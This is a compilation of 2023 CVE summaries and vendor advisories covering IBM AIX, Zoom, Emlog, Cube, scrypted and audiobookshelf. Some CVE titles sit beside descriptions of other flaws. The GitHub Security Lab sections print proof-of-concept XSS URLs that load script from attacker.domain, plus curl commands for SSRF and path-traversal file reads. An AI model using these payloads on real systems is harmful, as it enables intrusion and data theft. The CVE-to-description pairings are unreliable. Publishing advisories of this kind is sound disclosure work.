Emlog Pro v2.1.14 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the component /admin/article.php?active_savedraft.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-41618: wuhaozhe-s-CVE/CVE-2023-41618 at main · GhostBalladw/wuhaozhe-s-CVE

IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a privileged local user to exploit a vulnerability in the qdaemon command to escalate privileges or cause a denial of service.  IBM X-Force ID:  267972.

  

**Summary**

A vulnerability in the AIX printers system could allow a non-privileged local user to obtain elevated privileges or cause a denial of service (CVE-2023-45166, CVE-2023-45174, CVE-2023-45170).

**Vulnerability Details**

**Affected Products and Versions**

Affected Product(s)

Version(s)

AIX

7.2

AIX

7.3

VIOS

3.1

The vulnerabilities in the following filesets are being addressed:

Fileset

Lower Level

Upper Level

bos.rte.printers

7.2.5.100

7.2.5.101

printers.rte

7.2.4.0

7.2.4.0

bos.rte.printers

7.2.5.200

7.2.5.201

printers.rte

7.2.5.200

7.2.5.201

bos.rte.printers

7.3.0.0

7.3.0.2

printers.rte

7.3.0.2

7.3.0.2

bos.rte.printers

7.3.1.0

7.3.1.1

printers.rte

7.3.1.0

7.3.1.1

To find out whether the affected filesets are installed on your systems, refer to the lslpp command found in AIX user's guide.

Example:  lslpp -L | grep -I bos.printers.rte

**Remediation/Fixes**

**A. APARS**

IBM has assigned the following APARs to this problem:

AIX Level

APAR

SP

7.2.5

IJ48481

SP07

7.3.0

IJ48784

N/A

7.3.1

IJ48593

SP03

VIOS Level

APAR

FP

3.1.3

IJ49461

N/A

3.1.4

IJ48481

3.1.4.30

Subscribe to the APARs here:

https://www.ibm.com/support/pages/apar/\[APAR Number\]

By subscribing, you will receive periodic email alerting you to the status of the APAR, and a link to download the fix once it becomes available.

**B. FIXES**

IBM strongly recommends addressing the vulnerability now.

AIX and VIOS fixes are available.

The AIX and VIOS fixes can be downloaded via https from:

https://aix.software.ibm.com/aix/efixes/security/printers\_fix.tar

The fixes are cumulative and address the previously issued AIX/VIOS lpd security bulletin with respect to SP and TL:

https://aix.software.ibm.com/aix/efixes/security/lpd\_advisory3.asc

https://www.ibm.com/support/pages/node/6848309

The link above is to a tar file containing this signed advisory, fix packages, and OpenSSL signatures for each package. The fixes below include prerequisite checking. This will enforce the correct mapping between the fixes and AIX Technology Levels.

AIX Level

Interim Fix

7.2.5.5

IJ48481m5a.231207.epkg.Z

7.2.5.6

IJ48481m6a.230927.epkg.Z

7.3.0.2

IJ48784m2a.231207.epkg.Z

7.3.0.3

IJ48784m3a.231207.epkg.Z

7.3.0.4

IJ48784m4a.231002.epkg.Z

7.3.1.1

IJ48539m1a.231207.epkg.Z

7.3.1.2

IJ48539m2a.230928.epkg.Z

Please note that the above table refers to AIX TL/SP level as opposed to fileset level, i.e., 7.2.5.6 is AIX 7200-05-06.

VIOS Level

Interim Fix

3.1.3.21

IJ49461m2a.231207.epkg.Z

3.1.3.30

IJ49461m4a.231207.epkg.Z

3.1.3.40

IJ49461m4a.231207.epkg.Z

3.1.4.10

IJ48481m5a.231207.epkg.Z

3.1.4.21

IJ48481m6a.230927.epkg.Z

To extract the fixes from the tar file:

tar xvf printers\_fix.tar

cd printers\_fix

Verify you have retrieved the fixes intact:

The checksums below were generated using the "openssl dgst -sha256 \[filename\]" command as the following:

openssl dgst -sha256

filename

9121c3cdea0155b52bace7d3a056c5297c2f9e02b0bf956e3a18c71bae80c710

IJ48481m5a.231207.epkg.Z

a81f571475772a99e14687f84e7144ee788bc94fac32270202841cd934b84f6c

IJ48481m6a.230927.epkg.Z

0c178169d1379ad8e080c5bbfb4669d7d1dc43916b395e012b5c10c53a33432f

IJ48539m1a.231207.epkg.Z

583686e59b312511d4aad17a22192bc6743bb090ffa16a9331309dea2a683fcf

IJ48539m2a.230928.epkg.Z

13b443e0f2efd1197a0e28fdb6af6f49652c58b65b2985fb0d0911297062c2e6

IJ48784m2a.231207.epkg.Z

051200f7127afe81fb60ec3baa8030c6ee3d88d6214bd5cf77d4928d4bf449f0

IJ48784m3a.231207.epkg.Z

a6fea97596f7823e409042d2c850dcd761a0261c6007ee696d39ed814e77d3f4

IJ48784m4a.231002.epkg.Z

00b4e8e4949becd50f471cf30cc3d88c6e9e9e59ab144f60a5c89dfd817507fd

IJ49461m2a.231207.epkg.Z

7ef30ed9a48ffb899be1a54093598482fcfe4a36154b21a59cf43058847d17fc

IJ49461m4a.231207.epkg.Z

These sums should match exactly. The OpenSSL signatures in the tar file and on this advisory can also be used to verify the integrity of the fixes.  If the sums or signatures cannot be confirmed, contact IBM Support at http://ibm.com/support/ and describe the discrepancy.         

openssl dgst -sha256 -verify \[pubkey\_file\] -signature \[advisory\_file\].sig \[advisory\_file\]

openssl dgst -sha256 -verify \[pubkey\_file\] -signature \[ifix\_file\].sig \[ifix\_file\]

Published advisory OpenSSL signature file location:

https://aix.software.ibm.com/aix/efixes/security/printers\_advisory.asc.sig

**C. FIX AND INTERIM FIX INSTALLATION**

If possible, it is recommended that a mksysb backup of the system be created. Verify it is both bootable and readable before proceeding.

To preview a fix installation:

installp -a -d fix\_name -p all  # where fix\_name is the name of the

                                            # fix package being previewed.

To install a fix package:

installp -a -d fix\_name -X all  # where fix\_name is the name of the

                                            # fix package being installed.

Interim fixes have had limited functional and regression testing but not the full regression testing that takes place for Service Packs; however, IBM does fully support them.

Interim fix management documentation can be found at:

https://www.ibm.com/support/pages/managing-interim-fixes-aix

To preview an interim fix installation:

emgr -e ipkg\_name -p         # where ipkg\_name is the name of the

                                         # interim fix package being previewed.

To install an interim fix package:

emgr -e ipkg\_name -X         # where ipkg\_name is the name of the

                                         # interim fix package being installed.

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

11 Dec 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSPHKW","label":"PowerVM Virtual I\\/O Server"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"}\],"Version":"3.1","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}}\]

CVE-2023-45174: Security Bulletin: AIX is vulnerable to privilege escalation and denial of service (CVE-2023-45166, CVE-2023-45174, CVE-2023-45170)

Improper authentication in some Zoom clients before version 5.16.5 may allow an authenticated user to conduct a denial of service via network access.

**Zoom Clients - Improper Authentication**

*   Bulletin: ZSB-23062
*   CVEID: CVE-2023-49646
*   CVSS Severity: Medium
*   CVSS Score: 5.4
*   CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Description:

 Improper authentication in some Zoom clients before version 5.16.5 may allow an authenticated user to conduct a denial of service via network access.

Users can help keep themselves secure by applying current updates or downloading the latest Zoom software with all current security updates from https://zoom.us/download.

Affected Products:

*   Zoom Desktop Client for Windows before version 5.16.5
*   Zoom Desktop Client for macOS before version 5.16.5
*   Zoom Mobile App for iOS before version 5.16.5
*   Zoom Mobile App for Android before version 5.16.5
*   Zoom Desktop Client for Linux before version 5.16.5
*   Zoom VDI Client before version 5.16.5 (excluding 5.14.14 and 5.15.12)
*   Zoom SDKs before version 5.16.5

Source:

Reported by Zoom Offensive Security Team.

**Subscribe for updates**

Please provide your individual email address to receive notification of future Zoom Security Bulletins. (Note: Email aliases will not receive these notifications.)

CVE-2023-49646: ZSB 23062

Path traversal in Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom SDKs for Windows may allow an authenticated user to conduct an escalation of privilege via network access.

**Zoom Desktop Client for Windows, Zoom VDI Client for Windows and Zoom SDKs for Windows - Path Traversal**

*   Bulletin: ZSB-23059
*   CVEID: CVE-2023-43586
*   CVSS Severity: High
*   CVSS Score: 7.3
*   CVSS Vector String: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N

Description:

Path traversal in Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom SDKs for Windows may allow an authenticated user to conduct an escalation of privilege via network access.

Users can help keep themselves secure by applying current updates or downloading the latest Zoom software with all current security updates from https://zoom.us/download.

Affected Products:

*   Zoom Desktop Client for Windows before version 5.16.5
*   Zoom VDI Client before version 5.16.0 (excluding 5.14.14 and 5.15.12)
*   Zoom Video SDK for Windows before version 5.16.5
*   Zoom Meeting SDK for Windows before version 5.16.5

Source:

Reported by shmoul.

**Subscribe for updates**

Please provide your individual email address to receive notification of future Zoom Security Bulletins. (Note: Email aliases will not receive these notifications.)

CVE-2023-43586: ZSB 23059

Cryptographic issues Zoom Mobile App for Android, Zoom Mobile App for iOS, and Zoom SDKs for Android and iOS before version 5.16.0 may allow a privileged user to conduct a disclosure of information via network access.

**Zoom Mobile App for Android, Zoom Mobile App for iOS and Zoom SDKs - Cryptographic Issues**

*   Bulletin: ZSB-23056
*   CVEID: CVE-2023-43583
*   CVSS Severity: Medium
*   CVSS Score: 4.9
*   CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Description:

Cryptographic issues Zoom Mobile App for Android, Zoom Mobile App for iOS, and Zoom SDKs for Android and iOS before version 5.16.0 may allow a privileged user to conduct a disclosure of information via network access.

Users can help keep themselves secure by applying current updates or downloading the latest Zoom software with all current security updates from https://zoom.us/download.

Affected Products:

*   Zoom Mobile App for Android before version 5.16.0
*   Zoom Mobile App for iOS before version 5.16.0
*   Zoom Video SDK for Android before version 5.16.0
*   Zoom Video SDK for iOS before version 5.16.0
*   Zoom Meeting SDK for Android before version 5.16.0
*   Zoom Meeting SDK for iOS before version 5.16.0

Source:

Reported by Zoom Offensive Security Team.

**Subscribe for updates**

Please provide your individual email address to receive notification of future Zoom Security Bulletins. (Note: Email aliases will not receive these notifications.)

CVE-2023-43583: ZSB 23056

Improper access control in Zoom Mobile App for iOS and Zoom SDKs for iOS before version 5.16.5 may allow an authenticated user to conduct a disclosure of information via network access.

**Zoom Mobile App for iOS and SDKs for iOS - Improper Access Control**

*   Bulletin: ZSB-23058
*   CVEID: CVE-2023-43585
*   CVSS Severity: High
*   CVSS Score: 7.1
*   CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L

Description:

Improper access control in Zoom Mobile App for iOS and Zoom SDKs for iOS before version 5.16.5 may allow an authenticated user to conduct a disclosure of information via network access.

Users can help keep themselves secure by applying current updates or downloading the latest Zoom software with all current security updates from https://zoom.us/download.

Affected Products:

*   Zoom Mobile App for iOS before version 5.16.5
*   Zoom Video SDK for iOS before version 5.16.5
*   Zoom Meeting SDK for iOS before version 5.16.5
*   Zoom Meeting SDK for Android before version 5.16.0

Source:

Reported by Zoom Offensive Security Team.

**Subscribe for updates**

Please provide your individual email address to receive notification of future Zoom Security Bulletins. (Note: Email aliases will not receive these notifications.)

CVE-2023-43585: ZSB 23058

A Cross Site Scripting (XSS) vulnerability was discovered in Emlog Pro v2.1.14 via the component /admin/store.php.

CVE-2023-41621: wuhaozhe-s-CVE/CVE-2023-41621 at main · GhostBalladw/wuhaozhe-s-CVE

Scrypted is a home video integration and automation platform. In versions 0.55.0 and prior, a reflected cross-site scripting vulnerability exists in the login page via the `redirect_uri` parameter. By specifying a url with the javascript scheme (`javascript:`), an attacker can run arbitrary JavaScript code after the login. As of time of publication, no known patches are available.

**Coordinated Disclosure Timeline**

*   2023-10-6: Report Submitted
*   2023-10-13: Advisory Published

**Summary**

Two refelcted Cross-Site Scripting (XSS) vulnerabilities exist in scrypted that may allow an attacker to impersonate any user who clicks on specially crafted links. In the worst case, an attacker may be able to impersonate an administrator and run arbitrary commands.

**Project**

scrypted

**Tested Version**

v55.0

**Details****Issue 1: reflected XSS in plugin-http.ts (GHSL-2023-218)**

The owner and pkg parameters are reflected back in the response when the endpoint is not found, allowing for a reflected XSS vulnerability.

    const { owner, pkg } = req.params;
            let endpoint = pkg;
            if (owner)
                endpoint = `@${owner}/${endpoint}`;
            const pluginData = await this.getEndpointPluginData(req, endpoint, isUpgrade, isEngineIOEndpoint);
    
            if (!pluginData) {
                end(404, `Not Found (plugin or device "${endpoint}" not found)`);
                return;
            }
    
    
    

**Impact**

This issue may lead to Remote Code Execution.

**Resources**

Proof of Concept:

The following url will create a script tag in the current document which will load attacker.domain/rce.js. This JavaScript file can then be used to communicate with the server over HTTP via RPC, and send some requests to get the nativeId and proxyID for the automation:update-plugins and achieve the ability to run shell commands at a specified time.

https://localhost:10443/endpoint/%3Cimg%20src%20onerror=a=document.createElement(‘script’);a.setAttribute(‘src’,document.location.hash.substr(1));document.head.appendChild(a)%3E/pkg#//attacker.domain/rce.js

In the browser, you should see the script element be created with the src as https://attacker.domain/rce.js.

**Issue 2: reflected XSS in plugins/core/ui/src/Login.vue (GHSL-2023-219)**

A reflected XSS vulnerability exists in the login page via the redirect_uri parameter. By specifying a url with the javascript scheme (javascript:), an attacker can run arbitrary JavaScript code after the login.

      try {
              const redirect_uri = new URL(window.location).searchParams.get('redirect_uri');
              if (redirect_uri) {
                window.location = redirect_uri;
                return;
              }
    
            }
    

**Impact**

This issue may lead to Remote Code Execution.

**Resources**

Proof of Concept:

When the user is not logged in, send a link to the server with the parameter:

redirect_uri=javascript:var script = document.createElement('script');script.src = 'https://attacker.domain'; document.head.appendChild(script);

at the end of the uri (but before the #).

Example: https://localhost:10443/endpoint/test/test?redirect_uri=javascript:var%20script%20=%20document.createElement('script');script.src%20=%20'https://attacker.domain';%20document.head.appendChild(script);#//

Similar to Proof of Concept 1 this will load a JavaScript file which can make authenticated requests to the server, possibly leading to RCE.

**Credit**

These issues were discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings). This vulnerability was found with the help of CodeQL Reflected XSS query.

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2023-218 or GHSL-2023-219 in any communication regarding these issues.

CVE-2023-47623: GHSL-2023-218_GHSL-2023-219: Cross-Site Scripting (XSS) in scrypted

Cube is a semantic layer for building data applications. Prior to version 0.34.34, it is possible to make the entire Cube API unavailable by submitting a specially crafted request to a Cube API endpoint. The issue has been patched in `v0.34.34` and it's recommended that all users exposing Cube APIs to the public internet upgrade to the latest version to prevent service disruption.
There are currently no workaround for older versions, and the recommendation is to upgrade.

**Impact**

It is possible to make the entire Cube API unavailable by submitting a specially crafted request to a Cube API endpoint.

**Patches**

The issue has been patched in the v0.34.34 and it's recommended that all users exposing Cube APIs to the public internet upgrade to the latest version to prevent service disruption.

**Workarounds**

There are currently no workaround for older versions, and the recommendation is to upgrade.

**References**

The issue was reported by an independent researcher in our Community Slack and has been promptly patched in the recent update.

CVE-2023-50709: Denial of service attack on the cube-api endpoint

Audiobookshelf is a self-hosted audiobook and podcast server. In versions 2.4.3 and prior, users with the update permission are able to read arbitrary files, delete arbitrary files and send a GET request to arbitrary URLs and read the response. This issue may lead to Information Disclosure. As of time of publication, no patches are available.

**Coordinated Disclosure Timeline**

*   2023-10-01: Report submitted to maintainer
*   2023-11-01: Advisory Published

**Summary**

Audiobookshelf is vulnerable to server-side request forgery (SSRF), arbitrary file read (AFR) and arbitrary file deletion (AFD) depending on the permissions of the user.

**Project**

audiobookshelf

**Tested Version**

v2.4.3

**Details**

Users with the update permission are able to read arbitrary files, delete arbitrary files and send a GET request to arbitrary URLs and read the response.

       const payload = req.body // <---- imagePath comes from req.body without sanitization
        if (payload.imagePath !== undefined && payload.imagePath !== req.author.imagePath) {
          if (!payload.imagePath && req.author.imagePath) {
            await CacheManager.purgeImageCache(req.author.id)
            await CoverManager.removeFile(req.author.imagePath) // <---- imagePath is passed to removeFile
          } else if (payload.imagePath.startsWith('http')) {
            const imageData = await AuthorFinder.saveAuthorImage(req.author.id, payload.imagePath) // <---- imagePath is used to make a GET request and its response is saved
            if (imageData) {
              if (req.author.imagePath) {
                await CacheManager.purgeImageCache(req.author.id)
              }
              payload.imagePath = imageData.path
              hasUpdated = true
            }
          } else if (payload.imagePath && payload.imagePath !== req.author.imagePath) {
            if (!await fs.pathExists(payload.imagePath)) {            // < ---- only check for existence of path, thus specifying any local file will result in file read
              Logger.error(`[AuthorController] Image path does not exist: "${payload.imagePath}"`)
              return res.status(400).send('Author image path does not exist')
            }
    
            if (req.author.imagePath) {
              await CacheManager.purgeImageCache(req.author.id)
            }
          }
        }
    

**Impact**

This issue may lead to Information Disclosure.

**Resources**

**SSRF**

1.  In order to exploit SSRF, first send a request with the url of the file you wish to download. Curl is messy, so I would just go into the UI and click to edit the author’s image and put in the desired url which will send a PATCH request to /api/authors/author-id.
2.  Download the file from api/authors/author-id/image with the following command:

curl -i -s -k -X $'GET' \
    -H $'Host: localhost:3333' -H $'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI2NmFjZTUxNy01NGJmLTRjYmUtYTBlZC05ZWZkMzZhNWI5NmMiLCJ1c2VybmFtZSI6InRlc3RlciIsImlhdCI6MTY5NTg0ODQ4Mn0.rvF1kTKXHMsjPYV_PtvMnCKNgvXxNrTDTiOIh8yz0hE' -H $'Content-Length: 2' \
    --data-binary $'\x0d\x0a' \
    $'http://localhost:3333/api/authors/40913999-5739-4c84-bff0-93f9b34a08ef/image?token=JWT_TOKEN&raw=true'

**Arbitrary File Deletion**

1.  In order to exploit arbitrary file deletion, first send a request with the path to the file you wish to delete. Curl is messy, so I would just go into the UI and click to edit the author’s image and put in the path to the file you wish to delete which will send a PATCH request to /api/authors/author-id.
2.  Then, go into the UI and click to edit the author’s image and put in nothing which will send a PATCH request to /api/authors/author-id with an empty imagePath, deleting the file.

**Issue 2: Arbitrary File Read in HlsRouter.js (GHSL-2023-204)**

Any user (regardless of their permissions) may be able to read files from the local file system due to a path traversal in the /hls endpoint.

     var streamId = req.params.stream
     var fullFilePath = Path.join(this.playbackSessionManager.StreamsPath, streamId, req.params.file)
     var exists = await fs.pathExists(fullFilePath)
     res.sendFile(fullFilePath)
    

**Impact**

This issue may lead to Information Disclosure.

**Resources**

Proof of Concept:

    curl -i -s -k -X $'GET' \
        -H $'Host: localhost:3333' -H $'Accept: application/json, text/plain, */*' -H $'Authorization: Bearer JWT TOKEN' -H $'Content-Length: 2' \
        --data-binary $'\x0d\x0a' \
        $'http://localhost:3333/hls/whatever/..%2F..%2F..%2F..%2F..%2F..%2F(url encoded full path here)'
    

Note: The %2Fs are URL-encoded forward slashes (/) to prevent confusion with the express regex parser. After traversing back enough directories, we can input the URL-encoded full path of the file we wish to access.

**Credit**

These issues were discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings). These issues were discovered with the help of CodeQL’s SSRF and Path Injection queries.

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2023-203 or GHSL-2023-204 in any communication regarding these issues.